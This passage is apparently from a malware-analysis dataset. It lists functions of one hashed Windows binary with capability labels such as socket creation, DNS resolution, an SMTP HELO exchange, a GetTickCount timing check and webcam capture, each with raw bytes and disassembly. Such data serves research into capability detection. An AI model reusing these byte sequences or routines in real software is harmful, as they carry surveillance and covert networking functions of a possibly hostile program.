"test eax, eax",
"mov dword [esp + 0x10], edx",
"je 0x46b688",
"mov eax, edx",
"cmp eax, 0x49",
"jl 0x46b688",
"mov al, byte [0x4ff48c]",
"mov byte [ecx + esi], al",
"mov al, byte [0x4ff48d]",
"inc ecx",
"test al, al",
"je 0x46b680",
"mov byte [ecx + esi], al",
"inc ecx",
"mov dword [esp + 0x10], 0",
"mov eax, dword [esp + 0x14]",
"dec eax",
"mov dword [esp + 0x14], eax",
"jne 0x46b5eb",
"mov ebp, dword [esp + 0x64]",
"mov ebx, dword [esp + 0x60]",
"mov eax, ebp",
"mov ebp, 3",
"cdq",
"idiv ebp",
"sub edx, 0",
"je 0x46b747",
"dec edx",
"je 0x46b6fc",
"dec edx",
"jne 0x46b765",
"xor edx, edx",
"xor eax, eax",
"mov dl, byte [edi + ebx]",
"mov al, byte [edi + ebx + 1]",
"mov ebp, edx",
"sar edx, 2",
"and edx, 0x3f",
"and ebp, 3",
"shl ebp, 4",
"mov dl, byte [esp + edx + 0x18]",
"mov byte [ecx + esi], dl",
"mov edx, eax",
"sar edx, 4",
"and edx, 0xf",
"inc ecx",
"or edx, ebp",
"inc ecx",
"and eax, 0xf",
"mov dl, byte [esp + edx + 0x18]",
"mov al, byte [esp + eax*4 + 0x18]",
"mov byte [ecx + esi - 1], dl",
"mov byte [ecx + esi], al",
"jmp 0x46b724",
"xor eax, eax",
"mov al, byte [edi + ebx]",
"mov edx, eax",
"and eax, 3",
"sar edx, 2",
"and edx, 0x3f",
"inc ecx",
"shl eax, 4",
"mov dl, byte [esp + edx + 0x18]",
"mov al, byte [esp + eax + 0x18]",
"mov byte [ecx + esi - 1], dl",
"mov byte [ecx + esi], al",
"inc ecx",
"mov byte [ecx + esi], 0x3d",
"mov eax, dword [esp + 0x6c]",
"inc ecx",
"mov byte [ecx + esi], 0x3d",
"inc ecx",
"test eax, eax",
"je 0x46b765",
"mov dl, byte [0x4ff48c]",
"mov byte [ecx + esi], dl",
"mov al, byte [0x4ff48d]",
"inc ecx",
"test al, al",
"je 0x46b765",
"jmp 0x46b761",
"mov eax, dword [esp + 0x6c]",
"test eax, eax",
"je 0x46b765",
"mov al, byte [0x4ff48c]",
"mov byte [ecx + esi], al",
"mov al, byte [0x4ff48d]",
"inc ecx",
"test al, al",
"je 0x46b765",
"mov byte [ecx + esi], al",
"inc ecx",
"mov edx, dword [esp + 0x68]",
"mov byte [ecx + esi], 0",
"mov eax, esi",
"pop edi",
"pop esi",
"pop ebp",
"mov dword [edx], ecx",
"pop ebx",
"add esp, 0x4c",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46b7a0
|
[
"Create tcp socket",
"Create udp socket",
"Set socket configuration"
] |
51568bf1e8470100006a006a016a02e880be0200890683f8ff5e750433c059c38d4c24006a0451680110000068ffff000050c744241400000000e85bbe0200b80100000059c3
|
[
"push ecx",
"push esi",
"mov esi, ecx",
"call fcn.0046b8f0",
"push 0",
"push 1",
"push 2",
"call sub.WS2_32.dll_socket",
"mov dword [esi], eax",
"cmp eax, 0xffffffff",
"pop esi",
"jne 0x46b7c0",
"xor eax, eax",
"pop ecx",
"ret",
"lea ecx, [esp]",
"push 4",
"push ecx",
"push 0x1001",
"push 0xffff",
"push eax",
"mov dword [esp + 0x14], 0",
"call sub.WS2_32.dll_setsockopt",
"mov eax, 1",
"pop ecx",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46b7a1
|
[
"Create tcp socket",
"Create udp socket",
"Set socket configuration"
] |
51568bf1e8470100006a006a016a02e880be0200890683f8ff5e750433c059c38d4c24006a0451680110000068ffff000050c744241400000000e85bbe0200b80100000059c3
|
[
"push ecx",
"push esi",
"mov esi, ecx",
"call fcn.0046b8f0",
"push 0",
"push 1",
"push 2",
"call sub.WS2_32.dll_socket",
"mov dword [esi], eax",
"cmp eax, 0xffffffff",
"pop esi",
"jne 0x46b7c0",
"xor eax, eax",
"pop ecx",
"ret",
"lea ecx, [esp]",
"push 4",
"push ecx",
"push 0x1001",
"push 0xffff",
"push eax",
"mov dword [esp + 0x14], 0",
"call sub.WS2_32.dll_setsockopt",
"mov eax, 1",
"pop ecx",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46b7f0
|
[
"Resolve dns"
] |
83ec1033c05657894424088bf98944240c8b4c242089442410518944241866c744240c0200e814be02008b74241c668944240a56e8dbbd020083f8ff8944240c751556e8d2bd020085c074218b500c8b028b08894c240c8d5424086a10528bcfe82b0000005f5e83c410c208006826270000e8e5bd02005f33c05e83c410c20800
|
[
"sub esp, 0x10",
"xor eax, eax",
"push esi",
"push edi",
"mov dword [esp + 8], eax",
"mov edi, ecx",
"mov dword [esp + 0xc], eax",
"mov ecx, dword [esp + 0x20]",
"mov dword [esp + 0x10], eax",
"push ecx",
"mov dword [esp + 0x18], eax",
"mov word [esp + 0xc], 2",
"call sub.WS2_32.dll_htons",
"mov esi, dword [esp + 0x1c]",
"mov word [esp + 0xa], ax",
"push esi",
"call sub.WS2_32.dll_inet_addr",
"cmp eax, 0xffffffff",
"mov dword [esp + 0xc], eax",
"jne 0x46b847",
"push esi",
"call sub.WS2_32.dll_gethostbyname",
"test eax, eax",
"je 0x46b85d",
"mov edx, dword [eax + 0xc]",
"mov eax, dword [edx]",
"mov ecx, dword [eax]",
"mov dword [esp + 0xc], ecx",
"lea edx, [esp + 8]",
"push 0x10",
"push edx",
"mov ecx, edi",
"call fcn.0046b880",
"pop edi",
"pop esi",
"add esp, 0x10",
"ret 8",
"push 0x2726",
"call sub.WS2_32.dll_WSASetLastError",
"pop edi",
"xor eax, eax",
"pop esi",
"add esp, 0x10",
"ret 8"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46b880
|
[
"Connect socket"
] |
8b4424088b542404508b015250e8aebd020033c983f8ff0f95c18bc1c20800
|
[
"mov eax, dword [esp + 8]",
"mov edx, dword [esp + 4]",
"push eax",
"mov eax, dword [ecx]",
"push edx",
"push eax",
"call sub.WS2_32.dll_connect",
"xor ecx, ecx",
"cmp eax, 0xffffffff",
"setne cl",
"mov eax, ecx",
"ret 8"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46b910
|
[
"Get socket status"
] |
81ec0c0100008b018d4c2400516a008d5424106a00526a00c744241400000000c74424180000000089442420c744241c01000000e8d3bc020083f8ff750b33c081c40c010000c204008b94241001000033c985c00f95c1890ab80100000081c40c010000c20400
|
[
"sub esp, 0x10c",
"mov eax, dword [ecx]",
"lea ecx, [esp]",
"push ecx",
"push 0",
"lea edx, [esp + 0x10]",
"push 0",
"push edx",
"push 0",
"mov dword [esp + 0x14], 0",
"mov dword [esp + 0x18], 0",
"mov dword [esp + 0x20], eax",
"mov dword [esp + 0x1c], 1",
"call sub.WS2_32.dll_select",
"cmp eax, 0xffffffff",
"jne 0x46b959",
"xor eax, eax",
"add esp, 0x10c",
"ret 4",
"mov edx, dword [esp + 0x110]",
"xor ecx, ecx",
"test eax, eax",
"setne cl",
"mov dword [edx], ecx",
"mov eax, 1",
"add esp, 0x10c",
"ret 4"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46bdd0
|
[
"Access peb ldr_data"
] |
6aff6880c74b0064a100000000506489250000000083ec08568bf18d4c2404e88cfbffff8d4424048d4e0450c744241800000000e8f7fbffff8d4c2404518d4e14e8eafbffff8d4e0ce8610c04008d4e10e8590c04006aff6a008d4e1ce8fe2300006aff6a008d4e30e8f22300006aff6a008d4e44e8e62300008d4c2408c744241401000000e8990c04008d4c2404c7442414ffffffffe8880c04008b4c240c5e64890d0000000083c414c3
|
[
"push 0xffffffffffffffff",
"push 0x4bc780",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 8",
"push esi",
"mov esi, ecx",
"lea ecx, [esp + 4]",
"call fcn.0046b980",
"lea eax, [esp + 4]",
"lea ecx, [esi + 4]",
"push eax",
"mov dword [esp + 0x18], 0",
"call fcn.0046ba00",
"lea ecx, [esp + 4]",
"push ecx",
"lea ecx, [esi + 0x14]",
"call fcn.0046ba00",
"lea ecx, [esi + 0xc]",
"call fcn.004aca7f",
"lea ecx, [esi + 0x10]",
"call fcn.004aca7f",
"push 0xffffffffffffffff",
"push 0",
"lea ecx, [esi + 0x1c]",
"call fcn.0046e230",
"push 0xffffffffffffffff",
"push 0",
"lea ecx, [esi + 0x30]",
"call fcn.0046e230",
"push 0xffffffffffffffff",
"push 0",
"lea ecx, [esi + 0x44]",
"call fcn.0046e230",
"lea ecx, [esp + 8]",
"mov dword [esp + 0x14], 1",
"call fcn.004acaf4",
"lea ecx, [esp + 4]",
"mov dword [esp + 0x14], 0xffffffff",
"call fcn.004acaf4",
"mov ecx, dword [esp + 0xc]",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x14",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46ca78
|
[
"Get hostname"
] |
64a1000000006aff68a8c94b00506489250000000083ec64568bf1578b460485c07405e8180500008b7c247c85ff0f84d7000000803f000f84ce0000008b84248c00000085c07f05b8d00700008bce894608e8e9ecffff85c075126884f64f008d4e38e869010400e99e0000008b8424800000008bce5057e813edffff85c0751b8bcee808eeffff5783c6386860f64f0056e8c8d7030083c40ceb6f68dc0000008bcec7460401000000e8110d000085c074518d4c24086a6451e8dfaa02008b8424880000008b8c24840000008d94248c000000c784248c0000000100000052508d54241051528bcee8f200000085c0752e578d4638683cf64f0050e85ed7030083c40c8bcee8350400005f33c05e8b4c246464890d0000000083c470c214008b84248c00000085c00f84990000008b0dcc625000894c247c8d5424088d44247c526830f64f0050c784248000000000000000e807d703008b94248800000083c9ff8bfa33c083c40cf2aef7d14951528bcee8c9ecffff85c0750f6820f64f008d4e38e849000400eb1068fa0000008bcee82a0c000085c0751d8bcee89f0300008d4c247cc7442474ffffffffe8e2fe0300e954ffffff8d4c247cc7442474ffffffffe8ccfe03008b4c246c5fb8010000005e64890d0000000083c470c21400
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4bc9a8",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x64",
"push esi",
"mov esi, ecx",
"push edi",
"mov eax, dword [esi + 4]",
"test eax, eax",
"je 0x46ca88",
"call fcn.0046cfa0",
"mov edi, dword [esp + 0x7c]",
"test edi, edi",
"je 0x46cb6b",
"cmp byte [edi], 0",
"je 0x46cb6b",
"mov eax, dword [esp + 0x8c]",
"test eax, eax",
"jg 0x46caad",
"mov eax, 0x7d0",
"mov ecx, esi",
"mov dword [esi + 8], eax",
"call fcn.0046b7a0",
"test eax, eax",
"jne 0x46cacd",
"push 0x4ff684",
"lea ecx, [esi + 0x38]",
"call fcn.004acc31",
"jmp 0x46cb6b",
"mov eax, dword [esp + 0x80]",
"mov ecx, esi",
"push eax",
"push edi",
"call fcn.0046b7f0",
"test eax, eax",
"jne 0x46cafc",
"mov ecx, esi",
"call fcn.0046b8f0",
"push edi",
"add esi, 0x38",
"push 0x4ff660",
"push esi",
"call fcn.004aa2bf",
"add esp, 0xc",
"jmp 0x46cb6b",
"push 0xdc",
"mov ecx, esi",
"mov dword [esi + 4], 1",
"call fcn.0046d820",
"test eax, eax",
"je 0x46cb64",
"lea ecx, [esp + 8]",
"push 0x64",
"push ecx",
"call sub.WS2_32.dll_gethostname",
"mov eax, dword [esp + 0x88]",
"mov ecx, dword [esp + 0x84]",
"lea edx, [esp + 0x8c]",
"mov dword [esp + 0x8c], 1",
"push edx",
"push eax",
"lea edx, [esp + 0x10]",
"push ecx",
"push edx",
"mov ecx, esi",
"call fcn.0046cc40",
"test eax, eax",
"jne 0x46cb80",
"push edi",
"lea eax, [esi + 0x38]",
"push 0x4ff63c",
"push eax",
"call fcn.004aa2bf",
"add esp, 0xc",
"mov ecx, esi",
"call fcn.0046cfa0",
"pop edi",
"xor eax, eax",
"pop esi",
"mov ecx, dword [esp + 0x64]",
"mov dword fs:[0], ecx",
"add esp, 0x70",
"ret 0x14",
"mov eax, dword [esp + 0x8c]",
"test eax, eax",
"je 0x46cc28",
"mov ecx, dword [0x5062cc]",
"mov dword [esp + 0x7c], ecx",
"lea edx, [esp + 8]",
"lea eax, [esp + 0x7c]",
"push edx",
"push str.HELO__s_r_n",
"push eax",
"mov dword [esp + 0x80], 0",
"call fcn.004aa2bf",
"mov edx, dword [esp + 0x88]",
"or ecx, 0xffffffff",
"mov edi, edx",
"xor eax, eax",
"add esp, 0xc",
"repne scasb al, byte es:[edi]",
"not ecx",
"dec ecx",
"push ecx",
"push edx",
"mov ecx, esi",
"call fcn.0046b8a0",
"test eax, eax",
"jne 0x46cbea",
"push 0x4ff620",
"lea ecx, [esi + 0x38]",
"call fcn.004acc31",
"jmp 0x46cbfa",
"push 0xfa",
"mov ecx, esi",
"call fcn.0046d820",
"test eax, eax",
"jne 0x46cc17",
"mov ecx, esi",
"call fcn.0046cfa0",
"lea ecx, [esp + 0x7c]",
"mov dword [esp + 0x74], 0xffffffff",
"call fcn.004acaf4",
"jmp 0x46cb6b",
"lea ecx, [esp + 0x7c]",
"mov dword [esp + 0x74], 0xffffffff",
"call fcn.004acaf4",
"mov ecx, dword [esp + 0x6c]",
"pop edi",
"mov eax, 1",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x70",
"ret 0x14"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46d820
|
[
"Access peb ldr_data",
"Check for time delay via gettickcount"
] |
6aff6806cb4b0064a100000000506489250000000081ec20040000535556578bf933db6aff538d4f0c897c2424c74734ffffffffe87ce303006aff8d4f2053e871e303008d4f38894c2414e80ff203008d442430885c243089442410c744242800040000895c2424ff15c8f34b0089442420ff15c8f34b008b5424208b4f082bc23bc10f87030100008d4c242c518bcfe85be0ffff85c00f84120100008b44242c85c0750d68fa000000ff1590f34b00ebc08b6c24282beb4d790233ed8b542410558bcf8d041350e8e3dfffff8bf083feff0f84ef00000085f6740cff15c8f34b008944242003de8b4c24103beec6040b0075568b4424280500100000508944242ce80eef03008b7c24148be883c9ff33c083c404896c2410f2aef7d12bf98b4424248bd18bf78bfdc1e902f3a58bca83e10385c0f3a4740950e8ffee030083c4048b7c241c896c24248b4424106a0d50e84ad401008bf08b44241883c40885f68d0c0375028bf14e3bf0720a803e0a74054e3bf073f683c6043bf10f83f0feffff803e207458e9e6feffff8b4c241468e0f84f00e877f203008b4c2410684c270000c6040b00ff15dcf24b00eb458b4c241468d4f84f00e854f203008b542410c6041300eb2d8b4c241468d4f84f00e83cf203008b442410c6040300eb158d4efdc6060051e86dbf010089473483c404c60620837f34ff0f84f10000008b7424108bc603d83bc3895c241c0f83dd0000006a0d56e8c6d2010083c40885c00f84ca0000008bd08bd82bd683fa040f8ea200000083c6043bc6760b8078ff207705483bc677f58beec600008a450084c0740c3c2077088a45014584c075f46a2055e87ad201008bf083c40885f67520807d000074618b47148d4f0c5550e87ce203008b47288d4f2068383f5200eb418a56ff8d46ff80fa208bce770d8bc88a51ff8d41ff80fa2076f3c601008b47148d4f0c5550e845e203008a4601463c2077088a4601463c2076f88b47288d4f205650e828e203008b44241c8d73013bf0730e803e0a7501463bf00f8223ffffff8b77144e0f88a80000008d44241c56508d4f0ce8290100008b5c2414508bcbc784243c04000000000000e8a3f003008d4c241cc7842438040000ffffffffe8a2ef03008d4c241c568d6f20518bcde8ee0000008b108b4af885c98d4c241c0f9f44241be87def03008a44241b84c0745968d0f84f008bcbe8f9f203008d44242056508bcde8b8000000508bcbc784243c04000001000000e815f303008d4c2420c7842438040000ffffffffe835ef0300eb178b442410803800740a8b4c241450e85df003008b5c24148b44242485c0740950e878ec030083c4048b7f3483ffff75198b0b8b41f885c0750c68b4f84f008bcbe82bf0030033c0eb273bbc244004000074198b138b42f885c0750c6898f84f008bcbe809f0030033c0eb05b8010000008b8c24300400005f5e5d5b64890d0000000081c42c040000c20400
|
[
"push 0xffffffffffffffff",
"push 0x4bcb06",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x420",
"push ebx",
"push ebp",
"push esi",
"push edi",
"mov edi, ecx",
"xor ebx, ebx",
"push 0xffffffffffffffff",
"push ebx",
"lea ecx, [edi + 0xc]",
"mov dword [esp + 0x24], edi",
"mov dword [edi + 0x34], 0xffffffff",
"call fcn.004abbd5",
"push 0xffffffffffffffff",
"lea ecx, [edi + 0x20]",
"push ebx",
"call fcn.004abbd5",
"lea ecx, [edi + 0x38]",
"mov dword [esp + 0x14], ecx",
"call fcn.004aca7f",
"lea eax, [esp + 0x30]",
"mov byte [esp + 0x30], bl",
"mov dword [esp + 0x10], eax",
"mov dword [esp + 0x28], 0x400",
"mov dword [esp + 0x24], ebx",
"call dword [sym.imp.KERNEL32.dll_GetTickCount]",
"mov dword [esp + 0x20], eax",
"call dword [sym.imp.KERNEL32.dll_GetTickCount]",
"mov edx, dword [esp + 0x20]",
"mov ecx, dword [edi + 8]",
"sub eax, edx",
"cmp eax, ecx",
"ja 0x46d9ac",
"lea ecx, [esp + 0x2c]",
"push ecx",
"mov ecx, edi",
"call fcn.0046b910",
"test eax, eax",
"je 0x46d9cf",
"mov eax, dword [esp + 0x2c]",
"test eax, eax",
"jne 0x46d8d2",
"push 0xfa",
"call dword [sym.imp.KERNEL32.dll_Sleep]",
"jmp 0x46d892",
"mov ebp, dword [esp + 0x28]",
"sub ebp, ebx",
"dec ebp",
"jns 0x46d8dd",
"xor ebp, ebp",
"mov edx, dword [esp + 0x10]",
"push ebp",
"mov ecx, edi",
"lea eax, [ebx + edx]",
"push eax",
"call fcn.0046b8d0",
"mov esi, eax",
"cmp esi, 0xffffffff",
"je 0x46d9e7",
"test esi, esi",
"je 0x46d908",
"call dword [sym.imp.KERNEL32.dll_GetTickCount]",
"mov dword [esp + 0x20], eax",
"add ebx, esi",
"mov ecx, dword [esp + 0x10]",
"cmp ebp, esi",
"mov byte [ebx + ecx], 0",
"jne 0x46d96a",
"mov eax, dword [esp + 0x28]",
"add eax, 0x1000",
"push eax",
"mov dword [esp + 0x2c], eax",
"call fcn.004ac835",
"mov edi, dword [esp + 0x14]",
"mov ebp, eax",
"or ecx, 0xffffffff",
"xor eax, eax",
"add esp, 4",
"mov dword [esp + 0x10], ebp",
"repne scasb al, byte es:[edi]",
"not ecx",
"sub edi, ecx",
"mov eax, dword [esp + 0x24]",
"mov edx, ecx",
"mov esi, edi",
"mov edi, ebp",
"shr ecx, 2",
"rep movsd dword es:[edi], dword [esi]",
"mov ecx, edx",
"and ecx, 3",
"test eax, eax",
"rep movsb byte es:[edi], byte [esi]",
"je 0x46d962",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"mov edi, dword [esp + 0x1c]",
"mov dword [esp + 0x24], ebp",
"mov eax, dword [esp + 0x10]",
"push 0xd",
"push eax",
"call fcn.0048adc0",
"mov esi, eax",
"mov eax, dword [esp + 0x18]",
"add esp, 8",
"test esi, esi",
"lea ecx, [ebx + eax]",
"jne 0x46d988",
"mov esi, ecx",
"dec esi",
"cmp esi, eax",
"jb 0x46d997",
"cmp byte [esi], 0xa",
"je 0x46d997",
"dec esi",
"cmp esi, eax",
"jae 0x46d98d",
"add esi, 4",
"cmp esi, ecx",
"jae 0x46d892",
"cmp byte [esi], 0x20",
"je 0x46d9ff",
"jmp 0x46d892",
"mov ecx, dword [esp + 0x14]",
"push 0x4ff8e0",
"call fcn.004acc31",
"mov ecx, dword [esp + 0x10]",
"push 0x274c",
"mov byte [ebx + ecx], 0",
"call dword [sym.imp.KERNEL32.dll_SetLastError]",
"jmp 0x46da14",
"mov ecx, dword [esp + 0x14]",
"push 0x4ff8d4",
"call fcn.004acc31",
"mov edx, dword [esp + 0x10]",
"mov byte [ebx + edx], 0",
"jmp 0x46da14",
"mov ecx, dword [esp + 0x14]",
"push 0x4ff8d4",
"call fcn.004acc31",
"mov eax, dword [esp + 0x10]",
"mov byte [ebx + eax], 0",
"jmp 0x46da14",
"lea ecx, [esi - 3]",
"mov byte [esi], 0",
"push ecx",
"call fcn.00489978",
"mov dword [edi + 0x34], eax",
"add esp, 4",
"mov byte [esi], 0x20",
"cmp dword [edi + 0x34], 0xffffffff",
"je 0x46db0f",
"mov esi, dword [esp + 0x10]",
"mov eax, esi",
"add ebx, eax",
"cmp eax, ebx",
"mov dword [esp + 0x1c], ebx",
"jae 0x46db0f",
"push 0xd",
"push esi",
"call fcn.0048ad00",
"add esp, 8",
"test eax, eax",
"je 0x46db0f",
"mov edx, eax",
"mov ebx, eax",
"sub edx, esi",
"cmp edx, 4",
"jle 0x46daf6",
"add esi, 4",
"cmp eax, esi",
"jbe 0x46da66",
"cmp byte [eax - 1], 0x20",
"ja 0x46da66",
"dec eax",
"cmp eax, esi",
"ja 0x46da5b",
"mov ebp, esi",
"mov byte [eax], 0",
"mov al, byte [ebp]",
"test al, al",
"je 0x46da7e",
"cmp al, 0x20",
"ja 0x46da7e",
"mov al, byte [ebp + 1]",
"inc ebp",
"test al, al",
"jne 0x46da72",
"push 0x20",
"push ebp",
"call fcn.0048ad00",
"mov esi, eax",
"add esp, 8",
"test esi, esi",
"jne 0x46daaf",
"cmp byte [ebp], 0",
"je 0x46daf6",
"mov eax, dword [edi + 0x14]",
"lea ecx, [edi + 0xc]",
"push ebp",
"push eax",
"call fcn.004abd1e",
"mov eax, dword [edi + 0x28]",
"lea ecx, [edi + 0x20]",
"push 0x523f38",
"jmp 0x46daf0",
"mov dl, byte [esi - 1]",
"lea eax, [esi - 1]",
"cmp dl, 0x20",
"mov ecx, esi",
"ja 0x46dac9",
"mov ecx, eax",
"mov dl, byte [ecx - 1]",
"lea eax, [ecx - 1]",
"cmp dl, 0x20",
"jbe 0x46dabc",
"mov byte [ecx], 0",
"mov eax, dword [edi + 0x14]",
"lea ecx, [edi + 0xc]",
"push ebp",
"push eax",
"call fcn.004abd1e",
"mov al, byte [esi + 1]",
"inc esi",
"cmp al, 0x20",
"ja 0x46dae9",
"mov al, byte [esi + 1]",
"inc esi",
"cmp al, 0x20",
"jbe 0x46dae1",
"mov eax, dword [edi + 0x28]",
"lea ecx, [edi + 0x20]",
"push esi",
"push eax",
"call fcn.004abd1e",
"mov eax, dword [esp + 0x1c]",
"lea esi, [ebx + 1]",
"cmp esi, eax",
"jae 0x46db0f",
"cmp byte [esi], 0xa",
"jne 0x46db07",
"inc esi",
"cmp esi, eax",
"jb 0x46da32",
"mov esi, dword [edi + 0x14]",
"dec esi",
"js 0x46dbc1",
"lea eax, [esp + 0x1c]",
"push esi",
"push eax",
"lea ecx, [edi + 0xc]",
"call fcn.0046dc50",
"mov ebx, dword [esp + 0x14]",
"push eax",
"mov ecx, ebx",
"mov dword [esp + 0x43c], 0",
"call fcn.004acbe1",
"lea ecx, [esp + 0x1c]",
"mov dword [esp + 0x438], 0xffffffff",
"call fcn.004acaf4",
"lea ecx, [esp + 0x1c]",
"push esi",
"lea ebp, [edi + 0x20]",
"push ecx",
"mov ecx, ebp",
"call fcn.0046dc50",
"mov edx, dword [eax]",
"mov ecx, dword [edx - 8]",
"test ecx, ecx",
"lea ecx, [esp + 0x1c]",
"setg byte [esp + 0x1b]",
"call fcn.004acaf4",
"mov al, byte [esp + 0x1b]",
"test al, al",
"je 0x46dbd8",
"push 0x4ff8d0",
"mov ecx, ebx",
"call fcn.004ace84",
"lea eax, [esp + 0x20]",
"push esi",
"push eax",
"mov ecx, ebp",
"call fcn.0046dc50",
"push eax",
"mov ecx, ebx",
"mov dword [esp + 0x43c], 1",
"call fcn.004acec0",
"lea ecx, [esp + 0x20]",
"mov dword [esp + 0x438], 0xffffffff",
"call fcn.004acaf4",
"jmp 0x46dbd8",
"mov eax, dword [esp + 0x10]",
"cmp byte [eax], 0",
"je 0x46dbd4",
"mov ecx, dword [esp + 0x14]",
"push eax",
"call fcn.004acc31",
"mov ebx, dword [esp + 0x14]",
"mov eax, dword [esp + 0x24]",
"test eax, eax",
"je 0x46dbe9",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"mov edi, dword [edi + 0x34]",
"cmp edi, 0xffffffff",
"jne 0x46dc0a",
"mov ecx, dword [ebx]",
"mov eax, dword [ecx - 8]",
"test eax, eax",
"jne 0x46dc06",
"push 0x4ff8b4",
"mov ecx, ebx",
"call fcn.004acc31",
"xor eax, eax",
"jmp 0x46dc31",
"cmp edi, dword [esp + 0x440]",
"je 0x46dc2c",
"mov edx, dword [ebx]",
"mov eax, dword [edx - 8]",
"test eax, eax",
"jne 0x46dc28",
"push 0x4ff898",
"mov ecx, ebx",
"call fcn.004acc31",
"xor eax, eax",
"jmp 0x46dc31",
"mov eax, 1",
"mov ecx, dword [esp + 0x430]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x42c",
"ret 4"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46f2e0
|
[
"Capture webcam image"
] |
8b44240853568bf18b400483beec000000010f858b00000085c00f86830000008b8ebc00000085c97e798b4e1c576a0050681904000051ff1558f64b008bf88b86bc0000004785c0750433f6eb068bb6b400000083c60433db85ff7622558bef83c60656e8b749faff03f0568bdee8ad49faff83c40803f04f4d75e45d85ff5f752185db741d8b5424106a4e83c2105352e87ab0010083c40cb8010000005e5bc20c005e33c05bc20c00
|
[
"mov eax, dword [esp + 8]",
"push ebx",
"push esi",
"mov esi, ecx",
"mov eax, dword [eax + 4]",
"cmp dword [esi + 0xec], 1",
"jne 0x46f383",
"test eax, eax",
"jbe 0x46f383",
"mov ecx, dword [esi + 0xbc]",
"test ecx, ecx",
"jle 0x46f383",
"mov ecx, dword [esi + 0x1c]",
"push edi",
"push 0",
"push eax",
"push 0x419",
"push ecx",
"call dword [sym.imp.USER32.dll_SendMessageA]",
"mov edi, eax",
"mov eax, dword [esi + 0xbc]",
"inc edi",
"test eax, eax",
"jne 0x46f32e",
"xor esi, esi",
"jmp 0x46f334",
"mov esi, dword [esi + 0xb4]",
"add esi, 4",
"xor ebx, ebx",
"test edi, edi",
"jbe 0x46f35f",
"push ebp",
"mov ebp, edi",
"add esi, 6",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"mov ebx, esi",
"call fcn.00413d00",
"add esp, 8",
"add esi, eax",
"dec edi",
"dec ebp",
"jne 0x46f340",
"pop ebp",
"test edi, edi",
"pop edi",
"jne 0x46f383",
"test ebx, ebx",
"je 0x46f383",
"mov edx, dword [esp + 0x10]",
"push 0x4e",
"add edx, 0x10",
"push ebx",
"push edx",
"call fcn.0048a3f0",
"add esp, 0xc",
"mov eax, 1",
"pop esi",
"pop ebx",
"ret 0xc",
"pop esi",
"xor eax, eax",
"pop ebx",
"ret 0xc"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.